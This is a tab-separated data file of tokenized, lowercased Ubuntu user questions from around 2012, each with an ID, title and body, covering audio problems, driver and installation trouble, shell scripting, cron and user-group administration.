165789	headphones not working in ubuntu 12.04	i have a gateway m-6801m laptop , my speakers work great , but when i plug my headphones , the sound is instantly muted ( although the icon in the panel says that it is n't muted ) , i tried using different headphones and reinstalled alsa-base and pulseaudio , and that did n't fix my problem . here 's my hardware info : $ lspci | grep -i audio 00:1b.0 audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 03 ) i remember that when my laptop had windows 7 installed , the headphones did n't work unless i installed a specific driver from gateway 's site . also , when i run sunos 11 from the live cd , my headphones work without any need to hack/change/tweak , i tried to run ubuntu 12.04 and 10.10 from the live cd , and no luck , it did n't work . here 's a more detailed file with my system information : http : //www.alsa-project.org/db/ ? f=233963a7a2edc8b659b21396137747b291d1ff00
165798	installing xubuntu on a 4 gb storage device ( eee pc 701 )	now that xubuntu needs 4.3 gb of storage to install , i ca n't install it on my 4gb eee pc any more . the alternate installer just crashes spectacularly no matter how i try to install it . is there any way to get a more minimal install on this somehow ?
165800	what does `` export '' do ?	i never understand what `` export '' does . for example , what 's the difference between these two ? pythonpath=/home/myaccount/ & export pythonpath and pythonpath=/home/myaccount/ one with export and the other without .
165802	how to execute a command on multiple files and redirct output to a different file depending on the name of the input file	i am trying to convert a batch of latex files using catdvi . the command i use for a single file is : catdvi -e 1 -u 1.dvi | sed -re `` s/\ [ u\+2022\ ] /*/g '' | sed -re `` s/ ( [ ^^ [ : space : ] ] ) \s+/\1 /g '' > 1.txt however , i want to run the same command on all files from 1.dvi to 30.dvi . when i did : for f in *.dvi ; do catdvi -e 1 -u $ f | sed -re `` s/\ [ u\+2022\ ] /*/g '' | sed -re `` s/ ( [ ^^ [ : space : ] ] ) \s+/\1 /g '' > `` $ { f % .dvi } .txt '' ; done ; it gives an error expecting 0 or 1 arguments , got 10 , etc . what change do i need to do to the command ?
165804	how to show image color depth in eye of gnome ?	there seem to be no way to obtain the color depth info ( 32/24/8 bit ) of an image being displayed . is there plugin for that ? if you have any recommendation for better image viewer that has such feature , feel free to post
165809	is it possible to install virtualbox with only the command line interface ?	i wanted to install virtualbox 4.1 onto a remote ubuntu server . i need only the command line interface of vbox , i do not need the vbox gui . apt-get install virtualbox-4.1 brings itself the half of the kde what i do not need ( occupies > 600 mb ) . is it possible to install virtualbox without its gui ? version : ubuntu lucid
165814	installation of windows 7 from within ubuntu	my laptop is installed with ubuntu 12 . now i want to install windows 7 along with . is it possible to keep ubuntu and windows in one partition ? as in my laptop computer there in only one partition of 500gb . please advise ... thank you ...
165817	kubuntu 12.04 vmware workstation - no window after patch	i installed vmware workstation 7.1.5 on kuuntu 12.04 ( 3.2.0-26 ) . i have patched vmware . the problem is that vmware does not show any window on start . i tried to see if there were any errors by starting up vmware on the command line and here is the output : saadali @ nx00064 : ~/downloads/vmware workstation/7.1.5 $ vmware logging to /tmp/vmware-saadali/setup-22745.log ( vmware-modconfig:22631 ) : gtk-warning ** : unable to locate theme engine in module_path : `` oxygen-gtk '' , filename : /lib/modules/3.2.0-26-generic-pae/misc/vmmon.ko supported : external license : gpl v2 description : vmware virtual machine monitor . author : vmware , inc. srcversion : 9869fff2ea6b02360609ec6 depends : vermagic : 3.2.0-26-generic-pae smp mod_unload modversions 686 filename : /lib/modules/3.2.0-26-generic-pae/misc/vmnet.ko supported : external license : gpl v2 description : vmware virtual networking driver . author : vmware , inc. srcversion : db41c2b4c15ac67851c744f depends : vermagic : 3.2.0-26-generic-pae smp mod_unload modversions 686 filename : /lib/modules/3.2.0-26-generic-pae/misc/vmblock.ko supported : external version : 1.1.2.0 license : gpl v2 description : vmware blocking file system author : vmware , inc. srcversion : bcae10a6ffa68b7a1a93708 depends : vermagic : 3.2.0-26-generic-pae smp mod_unload modversions 686 parm : root : the directory the file system redirects to . ( charp ) filename : /lib/modules/3.2.0-26-generic-pae/misc/vmci.ko supported : external license : gpl v2 description : vmware virtual machine communication interface ( vmci ) . author : vmware , inc. srcversion : af0065c2aa6b67906f2173c depends : vermagic : 3.2.0-26-generic-pae smp mod_unload modversions 686 filename : /lib/modules/3.2.0-26-generic-pae/misc/vsock.ko supported : external license : gpl v2 version : 1.0.0.0 description : vmware virtual socket family author : vmware , inc. srcversion : caedbf81e2a76b434419b12 depends : vmci vermagic : 3.2.0-26-generic-pae smp mod_unload modversions 686 filename : /lib/modules/3.2.0-26-generic-pae/misc/vmmon.ko supported : external license : gpl v2 description : vmware virtual machine monitor . author : vmware , inc. srcversion : 9869fff2ea6b02360609ec6 depends : vermagic : 3.2.0-26-generic-pae smp mod_unload modversions 686 ( vmware-tray:22654 ) : gtk-warning ** : unable to locate theme engine in module_path : `` oxygen-gtk '' , here is the log : jul 20 10:32:52.847 : app-3076118208| log for vmware workstation pid=22745 version=7.1.5 build=build-491717 option=release jul 20 10:32:52.847 : app-3076118208| the process is 32-bit . jul 20 10:32:52.847 : app-3076118208| host codepage=utf-8 encoding=utf-8 jul 20 10:32:52.847 : app-3076118208| logging to /tmp/vmware-saadali/setup-22745.log jul 20 10:32:52.954 : app-3076118208| modconf query interface initialized jul 20 10:32:52.955 : app-3076118208| modconf library initialized i would be thankful to anyone who can solve this problem . vmware player that installed with this version is running just fine .
165821	installing or setting up barry in ubuntu 12.04	i 'm trying to setup or install barry on ubuntu 12.04 laptop to be able to sync my blackberry to thunderbird or evolution as i would to do on windows , but i 'm struggling to do so . i really need a step by step way to setup or install barry so that i can sync my barry to thunderbird or evolution 100 % and proper . i 've tried looking on the internet , but ca n't find proper step by step in installing barry . i 've tried linberry , but does n't have the feature in syncing your calendar , contacts and so on to thunderbird or evolution . please assist me in this .
165824	ubuntu 12.04 install problem ( uefi related ? )	i am trying to install ubuntu 12.04 in my new machine ( with motherboard asus m5a97 , amd64 3.1ghz ) and after the intro menu i select install ( or run without install ) and i only get a black screen after that . i think it 's related to the uefi boot mode but i am not sure . i tried to install ubuntu 11 as well and a get a similar problem ( although it starts to show some install information but then it stops again ) . i have also tried scientific linux . no success . when i installed windows 7 .. had no problems . any ideas ?
165828	batch command that reqiures output redirection	when i want to process a bunch of tex files , i use for f in *.tex ; do latex `` $ f '' ; done ; what do i do when i need to redirect output to another file , like in case of catdvi ? the following does not work : for f in *.dvi ; do catdvi -e 1 -u $ f > `` $ { f % .dvi } .txt '' ; done ; what am i doing wrong ?
165831	print specific dates in a specific format	i would like to write a bash script that prints out the date in the following format : 20120205_16 ( year ) ( month ) ( day ) _ ( 24 hour ) so the command to do this for the current date is : date +'20 % y % m % d_ % h' what i would like to do is print every date like this ( using a for loop or something ) from a specified date to another . for example : 20120205_16 - > 20120305_18 would be : 20120205_16 20120205_17 20120205_18 ... 20120305_17 20120305_18 is it possible to do this easily with date or another method ?
165834	lock kde workspace from terminal qdbus command	i know qdbus , but coulnd't find a command for it . is there a way to lock the entire workspace / all widgets from terminal ? i 'm on kubuntu 12.04 kde 4.8.4 . thanks .
165835	how can i add 1440x900 resolution on dell inspiron 1525 laptop	i have a 5 year-old dell inspiron 1525 laptop , with a display resolution of 1280x800 ( 16:10 ) . i wish to increase that resolution to at least 1440x900 . is this possible ? if so - how ? chipset : intel gm965 express chipset . graphics processor : integrated intel gma x3100 graphics ( previously changed to 965 express ) . lcd display : 15.4 '' widescreen with a 1280 × 800 resolution , 15.4 '' widescreen with a 1280 × 800 resolution and truelife , or a 15.4 '' widescreen with a 1440 x 900 high resolution and truelife . ( wikipedia ) cheers , uri
165836	please tell me where is my 8gb why it is showing my / is full	i 'm using ubuntu 11.10 . when i do df -h it shows me below image data : my problem is my drive /dev/xvda1 is showing 100 % used . but when i run sudo du -ch it shows 13gb used . 12 gb in /mnt 1 gb in / i can n't find my 8 gb in /dev/xvda1 i run php + rails in ubuntu . i deleted all log files also . please tell me where is my 8gb why it is showing my / is full
165841	command request me to report it 's bug ?	today i got a message when i was using ld command . it says : ld : please report this bug . so , what should i do ? is it serious or just i should ignore it ? ( if it is good to report it , i 'll learn to do that ; ) no problem )
165842	count files in folder that allow directory listing on web service	there is a directory listing folder on web service look like this ; http : //archive.ubuntu.com/ubuntu/indices/ what is the best way to count a number of files or folders using a command line ? ( i tried to read manual about wget but i can not do it . ) i do not want to download them , just count .
165844	unable to connect to mobile broadband.. but it is detected	mobile broadband ( tata photon network ) is detected and shows in the connections system tray but it does not connect to the internet .
165849	how to start / stop dropbox at a specific time	i have setup a service on my ubuntu 10.04.4 lts server , which works when started and stopped manually using sudo service < service > start etc . however i would like to have the service ( dropbox btw . ) only running for a few hours each day , as the service uses a lot of memory . i have added the following to my cron using crontab -e , but it does n't work as expected : 1 5 * * * /etc/init.d/dropbox start 1 6 * * * /etc/init.d/dropbox stop this returns the following message start-stop-daemon : not found . am i doing it wrong and if so how do you start / stop a service at a specific time ?
165850	ubuntu software center not opening ( 12.04 )	i had just installed ubuntu 12.04 a day back to work alongside windows 7 . but today , when i tried to install vlc using the software center , it is not opening !
165853	i ca n't get my amd apu to use the propriety drivers , is there anyway to fix this ?	i have ubuntu 12.04 on a hp machine running on a amd apu a4 . for some reason i ca n't install the video drivers to play wow . can someone help me out and it keeps telling me to check my jlogs ?
165855	ubuntu 10.04 still supported but 10.10 not	can someone explain to me why an ubuntu version that is released later and has a higher version number ( 10.10 ) loses support and no longer is updated whereas a previous version ( 10.04 ) has support until next year ? thank you .
165858	ubuntu 12.04 stereo duplex sound problem	ubuntu 12.04 ; linux-kernel 3.2.0-27 ; alsa driver ver . 1.0.24 i have some problem with my hda intel alc662 rev1 . when i unmuting front mic in alsamixer , noise appear in my speakers in rear panel , but anyone devices is not plugged in in front panel . besides in pulseaudio-control panel in hardware properties my device set to analog stereo duplex , and i ca n't set it to analog stereo output beacouse it 's always set back to stereo duplex .
165860	lm-sensors reports incorrect chassis fan speed on asus m5a78l/usb3 in 12.04lts	i recently built a machine based on the asus m5a78l/usb3 motherboard and installed ubuntu 12.04 lts on it . most of the system sensors were automatically detected and work correctly . however , when i run sensors , both the chassis fan and cpu fan fields show the actual cpu fan speed . this happens regardless of whether a chassis fan is actually installed . bios ( v1003 , latest ) shows the correct readings . my question is , is it possible to get lm-sensors to report the chassis fan speed correctly with this motherboard ? and if not , is there some testing/data extraction/programming that i could do to help debug this ? i have already tried sudo sensors-detect . it reports that all needed modules are already loaded . i have also tried searching ask ubuntu and google , and could not find a solution . details output from sensors : k10temp-pci-00c3 adapter : pci adapter temp1 : +37.8°c ( high = +70.0°c ) ( crit = +83.5°c , hyst = +80.5°c ) atk0110-acpi-0 adapter : acpi interface vcore voltage : +1.45 v ( min = +0.85 v , max = +1.60 v ) +3.3 voltage : +3.28 v ( min = +2.97 v , max = +3.63 v ) +5 voltage : +5.07 v ( min = +4.50 v , max = +5.50 v ) +12 voltage : +12.03 v ( min = +10.20 v , max = +13.80 v ) cpu fan speed : 4655 rpm ( min = 600 rpm ) chassis fan speed : 4655 rpm ( min = 600 rpm ) cpu temperature : +50.0°c ( high = +60.0°c , crit = +95.0°c ) mb temperature : +39.0°c ( high = +45.0°c , crit = +75.0°c ) fam15h_power-pci-00c4 adapter : pci adapter power1 : 125.26 w ( crit = 124.77 w ) note that both the cpu fan and chassis fan fields report the cpu fan speed . this happens regardless of whether a chassis fan is installed . summary from sensors-detect : driver `to-be-written ' : * isa bus , address 0x290 chip `ite it8728f super io sensors ' ( confidence : 9 ) driver `fam15h_power ' ( autoloaded ) : * chip `amd family 15h power sensors ' ( confidence : 9 ) driver `k10temp ' ( autoloaded ) : * chip `amd family 15h thermal sensors ' ( confidence : 9 ) note one missing driver . however , since the driver atk0110-acpi-0 already reports the fan speeds , it would seem the missing driver is not relevant to this .
165868	installing mysql connector/c++	i would like to know which is the procedure to install the mysql c++ connector . after installing it to my ubuntu os will i have these extra c++ commands avaiable in every c++ ide ? for example , can i use them in qt , netbeans , eclipse for c++ and all other c++ ide environments after a successful installation ?
165869	how do i get german language back in thunderbird ?	some recent update has caused my thunderbird ( 14.0 on ubuntu 12.04 ) to revert to an english-language user interface . it used to be german before . my system is completely in german . german language support is fully installed in system settings . thunderbird-locale-de is installed as well . i even tried to remove and reinstall this package , without any visible change . i also tried resetting general.useragent.locale to de-de via thunderbird 's own configuration editor . no change as well . how do i get my german interface back ?
165870	unable to change alt_r key using xmodmap	i 've been trying to change the key mapping of my keyboard for certain keys . so far i 've been successful to do it using xmodmap for a variety of keys . however , no matter what i do , i ca n't get the alt_r ( the right side alt key ) which has a key code of 108 to map to the up key . here 's the command i 'm using : xmodmap -e `` keycode 108 = up '' is there anything more that i need to do to get this working . even after these changes , whenever i hit the alt_r key , it ends up minimizing the current window . i 'm on ubuntu 11.04
165877	mic is not workin in my desktop available : unknown	i am using ubuntu 12.04 desktop . mic is not working . i tried same mic in different place , that is working . this is out put of 'pacmd list-sources ' please help me . root @ vijay # pacmd list-sources welcome to pulseaudio ! use `` help '' for usage information . 3 source ( s ) available . index : 0 name : < alsa_output.pci-0000_01_00.1.hdmi-stereo.monitor > driver : < module-alsa-card.c > flags : decibel_volume latency dynamic_latency state : suspended suspend cause : idle priority : 1050 volume : 0 : 100 % 1 : 100 % 0 : 0.00 db 1 : 0.00 db balance 0.00 base volume : 100 % 0.00 db volume steps : 65537 muted : no current latency : 0.00 ms max rewind : 0 kib sample spec : s16le 2ch 44100hz channel map : front-left , front-right stereo used by : 0 linked by : 0 configured latency : 0.00 ms ; range is 0.50 .. 371.52 ms monitor_of : 0 card : 0 < alsa_card.pci-0000_01_00.1 > module : 4 properties : device.description = `` monitor of high definition audio controller digital stereo ( hdmi ) '' device.class = `` monitor '' alsa.card = `` 1 '' alsa.card_name = `` hda nvidia '' alsa.long_card_name = `` hda nvidia at 0xd6000000 irq 3 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:01:00.1 '' sysfs.path = `` /devices/pci0000:00/0000:00:01.0/0000:01:00.1/sound/card1 '' device.bus = `` pci '' device.vendor.id = `` 10de '' device.vendor.name = `` nvidia corporation '' device.product.name = `` high definition audio controller '' device.string = `` 1 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' index : 1 name : < alsa_output.pci-0000_00_1e.2.analog-stereo.monitor > driver : < module-alsa-card.c > flags : decibel_volume latency dynamic_latency state : idle suspend cause : priority : 1950 volume : 0 : 100 % 1 : 100 % 0 : 0.00 db 1 : 0.00 db balance 0.00 base volume : 100 % 0.00 db volume steps : 65537 muted : no current latency : 0.00 ms max rewind : 64 kib sample spec : s16le 2ch 44100hz channel map : front-left , front-right stereo used by : 0 linked by : 0 configured latency : 371.52 ms ; range is 1.00 .. 371.52 ms monitor_of : 1 card : 1 < alsa_card.pci-0000_00_1e.2 > module : 5 properties : device.description = `` monitor of built-in audio analog stereo '' device.class = `` monitor '' alsa.card = `` 0 '' alsa.card_name = `` intel ich7 '' alsa.long_card_name = `` intel ich7 with ad1888 at irq 22 '' alsa.driver_name = `` snd_intel8x0 '' device.bus_path = `` pci-0000:00:1e.2 '' sysfs.path = `` /devices/pci0000:00/0000:00:1e.2/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.name = `` 82801g ( ich7 family ) ac'97 audio controller '' device.form_factor = `` internal '' device.string = `` 0 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' index : 2 name : < alsa_input.pci-0000_00_1e.2.analog-stereo > driver : < module-alsa-card.c > flags : hardware hw_mute_ctrl hw_volume_ctrl decibel_volume latency dynamic_latency state : suspended suspend cause : idle priority : 9959 volume : 0 : 94 % 1 : 94 % 0 : -1.50 db 1 : -1.50 db balance 0.00 base volume : 42 % -22.50 db volume steps : 65537 muted : no current latency : 0.00 ms max rewind : 0 kib sample spec : s16le 2ch 44100hz channel map : front-left , front-right stereo used by : 0 linked by : 0 configured latency : 0.00 ms ; range is 0.50 .. 371.52 ms card : 1 < alsa_card.pci-0000_00_1e.2 > module : 5 properties : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` intel ich7 '' alsa.id = `` intel ich '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 0 '' alsa.card = `` 0 '' alsa.card_name = `` intel ich7 '' alsa.long_card_name = `` intel ich7 with ad1888 at irq 22 '' alsa.driver_name = `` snd_intel8x0 '' device.bus_path = `` pci-0000:00:1e.2 '' sysfs.path = `` /devices/pci0000:00/0000:00:1e.2/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.name = `` 82801g ( ich7 family ) ac'97 audio controller '' device.form_factor = `` internal '' device.string = `` front:0 '' device.buffering.buffer_size = `` 65536 '' device.buffering.fragment_size = `` 65536 '' device.access_mode = `` mmap+timer '' device.profile.name = `` analog-stereo '' device.profile.description = `` analog stereo '' device.description = `` built-in audio analog stereo '' alsa.mixer_name = `` analog devices ad1888 '' alsa.components = `` ac97a:41445368 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' ports : analog-input-microphone ; input-microphone-1 : microphone / microphone 1 ( priority 8720 , available : unknown ) properties : analog-input-microphone ; input-microphone-2 : microphone / microphone 2 ( priority 8719 , available : unknown ) properties : analog-input-linein : line in ( priority 8100 , available : unknown ) properties : analog-input : analog input ( priority 8000 , available : unknown ) properties : analog-input-video : video ( priority 7000 , available : unknown ) properties : active port : < analog-input-linein > lspci 00:00.0 host bridge : intel corporation 82945g/gz/p/pl memory controller hub ( rev 02 ) 00:01.0 pci bridge : intel corporation 82945g/gz/p/pl pci express root port ( rev 02 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 01 ) 00:1c.1 pci bridge : intel corporation n10/ich 7 family pci express port 2 ( rev 01 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 01 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 01 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 01 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 01 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev e1 ) 00:1e.2 multimedia audio controller : intel corporation 82801g ( ich7 family ) ac'97 audio controller ( rev 01 ) 00:1f.0 isa bridge : intel corporation 82801gb/gr ( ich7 family ) lpc interface bridge ( rev 01 ) 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 01 ) 00:1f.2 ide interface : intel corporation n10/ich7 family sata controller [ ide mode ] ( rev 01 ) 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 01 ) 01:00.0 vga compatible controller : nvidia corporation gt218 [ geforce 8400 gs ] ( rev a2 ) 01:00.1 audio device : nvidia corporation high definition audio controller ( rev a1 ) 04:00.0 ethernet controller : broadcom corporation netlink bcm5789 gigabit ethernet pci express ( rev 21 ) please help me .
165878	graphic drivers ati radeon x600 for ubuntu 12.04	i 've been trying to find out how to install the radeon x600 on this old laptop . i know this facts : it 's a legacy driver the kernel probably wo n't support it . i 'm looking to be able to have some 3d acceleration/display . i 'm not really sure what to do , and/or if the open source ( radeon driver ) will work properly . ( or if it 's even impossible to make it happen due the driver/hardware and kernel combination )
165883	ca n't install the ubuntu one indicator	sudo apt-get install indicator-ubuntuone reading package lists ... done building dependency tree reading state information ... done package indicator-ubuntuone is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'indicator-ubuntuone ' has no installation candidate i even tried 'ubuntuone-indicator ' , but that also did n't work .
165886	grive on ubuntu 12.10 gives : `` error while loading shared libraries : libbfd-2.22-system.so ''	i 've just installed ubuntu 12.10 and am trying to get grive working using these instructions . however when trying to run grive it gives me the following error : bquast @ baq : ~/grive $ grive -a grive : error while loading shared libraries : libbfd-2.22-system.so : can not open shared object file : no such file or directory i do n't know if this matters , but my home directory is on a separate partition .
165887	multiple versions of the same app on ubuntu software centre ?	i already published my proprietary app on ubuntu software centre ( https : //myapps.developer.ubuntu.com ) , and now i want to update it with the new version . this time i wanted to upload multiple builds for a single app ( one for ubuntu 12.04 i386 , one for ubuntu 12.04. amd64 , one for ubuntu 11.10 i386 , ... ) the problem is that it does n't seem possible . new upload overwrites the old one . is it correct that the software centre only supports a single binary package per application ? i could try creating the new app per build , but that seems like a wrong solution . any tips to solve the problem ?
165888	hud in other window managers ( especially xmonad )	it seems that hud is thightly tied to unity . however i just use xmonad as a window manager , especially i do n't use unity . is there a way to use hud within xmonad ( or more generally withing other window managers and desktop environments ) ? if so , what are the detailed steps to do it with minimal dependencies on unity ? are there alternative projects which similar functionality like hud which work together with many window managers without too much pain ?
165890	what is the schema xml file in the data/glib-2.0 folder of my quickly application ?	i created an ubuntu application with quickly , and i can see an xml file in the folder data/glib-2.0 of my project root and i am not exactly sure what this is for . the xml looks like this : < ? xml version= '' 1.0 '' encoding= '' utf-8 '' ? > < schemalist gettext-domain= '' sample-application '' > < schema id= '' net.launchpad.sample-application '' path= '' /net/launchpad/sample-application/ '' > < key name= '' example '' type= '' s '' > < default > '' < /default > < summary > sample setting < /summary > < description > longer description of this sample setting . talk about allowed values and what it does. < /description > < /key > < /schema > < /schemalist > furthermore , in the default preferences dialog code that is created with a new application , i can see the following code : settings = gio.settings ( `` net.launchpad.sample-application '' ) widget = self.builder.get_object ( 'example_entry ' ) settings.bind ( `` example '' , widget , `` text '' , gio.settingsbindflags.default ) and i am not sure what this is doing .
165895	no media player working except vlc by an ordinary user	i am using ubuntu 12.04 64 bit on my machine . now a days as anormal user whenever i try to play any media player on my system except vlc , the system simply hangs for about 10-15 minutes and throws an error in terminal . for rhythmbox : avinash @ titanic : ~ $ rhythmbox bus error ( core dumped ) for banshee for amarok for clementine for super user all the above media players do work . but what for ordinary user ? please help .
165901	how do i hide other users folder ?	i have used vsftpd to create and ftp server . i am using ubuntu 12.04 desktop version . i want to show directories that are assign to that user only . for example , i have created users `` a '' , '' b '' , '' c '' and groups `` developer '' and `` tester '' . the users are added in the group as follows : '' a '' -- -- > `` developer '' , `` tester '' . `` b '' -- -- > `` developer '' . `` c '' -- -- > `` tester '' . i have created `` developerdoc '' ( owner-root , group-developer ) and `` testerdoc '' ( owner-root , group-tester ) directory in the /home folder and assign all user 's home directory as /home . now when i log in with user `` a '' then it should shows me directory `` developerdoc '' and `` testerdoc '' because user a is in the both of these group . if i log in with user `` b '' then it should shows me directory `` developerdoc '' only . the directory `` testerdoc '' should not listed . the same is tre for user `` c '' only `` testerdoc '' should be listed . please guide me how in how i can achieve this .
165905	chromium-browser always reports it did n't shut down properly	chromium-browser always reports it did n't shut down properly when i first start it after a shutdown/reboot . i guess i could close it manually first before shutting down , but other apps seem to be ok with stopping themselves as the system shuts down , so why is chromium having a problem ( and can it be fixed ) ?
165908	unity : nautilus folder opens in background	i am used to open a folder from the keyboard with a shortcut . the alternatives are : use unity dash with the shortcut super + f to open the dash file lens open kupfer with the configured shortcut ( ctrl + alt + space , in my case ) then i type the name of the folder and press enter if it is selected . however , the window that opens up is not active but in the background . i have to press alt + tab to bring it into foreground . i use ubuntu precise ( 12.04. ) . question : how can i configure ubuntu , unity , nautilus so newly opened windows become foreground immediately ? edit : this behavior only happens when another application is already open such as gedit . it does not happen when the only other selectable entity is the desktop .
165914	somes importants shorcuts of blender does not work on ubuntu	in ubuntu ( and mint ) some important shortcuts for blender does not work . alt + right click to select an edge loop ( heavily used on all 3d softwares ) does n't work , a useless menu of ubuntu pop up to ask if the application must be closed or minimize . ctrl + alt + 0 to define the current view as the view of the camera minimize the application . this shortcut of ubuntu is useless , it 's faster to click on the minimize icon . ctrl + number to apply a subdivision surface level do nothing on blender , it 's one of the most used shortcut of blender . for the moment i stay on windows 7 just to use these 3 shortcuts .
165921	error on boot 12.04	when i boot my toshiba tecra ( nvidia ) say no protocol specified ( 2x and .. ) a lot of . then appears the next message : xinit : giving up xinit : unable to connect to x server : resource temporarily unavailable wainting for x server to shutdown ddxsiggiveup : closing log server terminated successfully ( 0 ) . closing log file . xinit : server error xauth : error in locking authority file /home/toshiba/.xauthority
165924	unity 3d icons disappear after update	after an update , the dock icons on unity 3d are gone . in 2d mode it 's normal . now i do n't know what to do . i already tried replace and reset commands , remove and install unity but nothing works for me . unity 's bar is still there but there are no icons . i 'm using ubuntu 12.04 lts ( 3.4.0.-030400-generic ) how can i fix this issue ?
165929	how do i get gnu grub to stop beeping and allow me to select an option from the boot menu ?	recently , my laptop started displaying the message 'grub loading ... ' while emitting a really loud beeping sound ( using the mute and volume adjustion keys had no effect ) , which always persists for a good minute . then , when i finally get to the boot menu , i can not move the selection , it does not respond to 'enter ' which should initiate the selected loader , and none of the other options work either . although i am not sure whether it is the cause , it started the day after i spilled a small amount of tea near the lower area of my laptop , although before i shut my computer down ( after which i was unable to start it up anymore ) , only the '6 ' and left shift keys stopped working . i have no idea on what to do , as i am relatively new to *nix systems , and i could not find anything useful on google . i have tried rebooting multiple times , as well as not using my computer for 12 hour to let whatever tea was left in there dry out . could someone point me in the right direction ?
165933	ca n't install ubuntu 12.04 on new machine	i built a new system with the intent of using ubuntu 12.04 as my primary os , but i am unable to install it . every time i boot , the splash screen with the options to try or install ubuntu appears as it should . when i make a selection , regardless of which option i select , the system freezes . the above mentioned splash screen with my option highlighted remains on the screen and a hard reset is the only way out . i am currently running windows 8 rp without any major issues . i have been trying to install ubuntu from a usb flash drive with little success . i do not have an optical drive and would really like to avoid having to use one . i tried two flash drives ( a 4gb sandisk and a generic 2gb one from a ebay seller in hong kong ) . i 've used both ufds to successfully install various distributions of linux in the past and the sandisk to install windows . i tried unetbootin and the windows command prompt to prepare the drives and i tried these methods with the 64-bit and 32-bit versions of both ubuntu 12.04 and ubuntu studio 12.04 . the result is always the same : a frozen screen shortly after boot . the relevant specs on my system are listed below : intel i5-3570k processor , msi z77a-g45 ( fintek f71889ad ) motherboard , patriot g2 ddr3 1600 ram ( 4gbx2 ) , intel 330 series ssd 60gb , evga nvidia geforce gtx 460 sc
165941	which partition should i install on on a dell xps 13 ?	i just bought the dell ultrabook xps 13 , but i have some difficulties to install ubuntu 12.04 . problem is about hard-disk partition . actually , the sda has already 4 part : and i do n't want delete the wrong part ... this is the information from windows : sda1 = oem ( 100 % free according windows , 33mb used on 41mb according linux ... ) sda2 = recovery sda3 = windows7 sda4 = standby extended ( hibernation ) ( 100 % free according windows , unknown according linux ) i think i should avoid to delete windows7 or recovery , then it 's between sda1 and sd4 . fact is that i do n't know what is oem and hibernation seem pretty useful ... if you have an idea or informations , thanks for your help : )
165942	how to change primary group	i want to remove user pserver from the group apache . # deluser pserver apache /usr/sbin/deluser : you may not remove the user from their primary group . now i want to add a new primary group , so i ran the following ; # usermod -g pserver pserver which returned the following : pserver` is now in group `pserver # groups pserver pserver : apache pserver now i want to remove the user again from group apache , but i get same error again . how can i delete pserver from the primary group apache ?
165947	ubuntu server - downloading speed suddenly reduced to < 5kb/sec	this happens on some of my ubuntu servers but not all . i just did a fresh install of ubuntu server 12.04 and when began to install updates , my 600kb/sec download speed is suddenly cut to 3kb/sec after several seconds . this happens irregardless of whether i use a bandwidth-limiting client like wondershaper . i believe that this is an ubuntu problem , as none of my other servers are experiencing this , including servers running other distros . any help is greatly appreciated !
165951	dpkg -- get-selections shows packages marked `` deinstall ''	executing dpkg -- get-selections shows packages with one of the markers install or deinstall . some packages i could remove completely with apt-get remove . what does deinstall mean ? what can be done so that the packages marked deinstall are not listed by dpkg -- get-selections anymore ?
165952	address bar in firefox automatically redirects to google search	whenever i type something in my address bar ( other than a url ) , firefox automatically uses google search to give me results for it . where can i change this behaviour in firefox ? i 'm using ubuntu 12.04 gnome classic . edit 1 : changing the behaviour as in , making another search engine as the default one . edit 2 : what i want is : while typing in the address bar , it should use a search engine of my choice to search . however , i want the search engine text box ( the text box to the right of the address bar ) to use google itself if i type something in there .
165953	no such file or directory ( not 64bits ! )	i am cross-compiling a program on my pc ( 12.04 ) for my beaglebone ( 12.04 precise armhf ) . but when i try to execute the program on beaglebone : root @ omap : /home/ubuntu/helloworld # ./helloworldtest bash : ./helloworldtest : no such file or directory here are some properties : root @ omap : /home/ubuntu/helloworld # file helloworldtest helloworldtest : elf 32-bit lsb executable , arm , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.31 , buildid [ sha1 ] =0xca0159e70b99493764b601a0195ee18be5e29b31 , not stripped root @ omap : /home/ubuntu/helloworld # ls -la total 80 drwxrwxr-x 2 ubuntu ubuntu 4096 jul 20 07:51 . drwxr-xr-x 5 ubuntu ubuntu 4096 jul 20 07:50 .. -rwxrwxrwx 1 ubuntu ubuntu 72739 jul 20 07:42 helloworldtest i searched net and found out that most of the people who had this problem , had it because they were using 64 bits machine to compile the code but my pc 's processor is 32 bits and my beaglebone 's is 32bits too . also the strange thing is that , i am able to run this program on beaglebone if i use angstrom linux , rather than ubuntu 12.04 precise armhf . therefore i am sure that there is not anything wrong with my cross-compile process and my cross-compiled program . what can be the problem ? regards edit : probably you are going to say install ia32-libs but i can not install ia32-libs : root @ omap : ~/helloworldtest # apt-get install ia32-libs reading package lists ... done building dependency tree reading state information ... done package ia32-libs is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'ia32-libs ' has no installation candidate edit2 : here is the ldd output : root @ omap : /home/ubuntu/helloworld # ldd helloworldtest not a dynamic executable i compiled the same program on the target-machine ( beaglebone ) and checked its ldd output : root @ omap : ~ # ldd compiled_on_beaglebone libgcc_s.so.1 = > /lib/arm-linux-gnueabihf/libgcc_s.so.1 ( 0x400de000 ) libc.so.6 = > /lib/arm-linux-gnueabihf/libc.so.6 ( 0x400ef000 ) 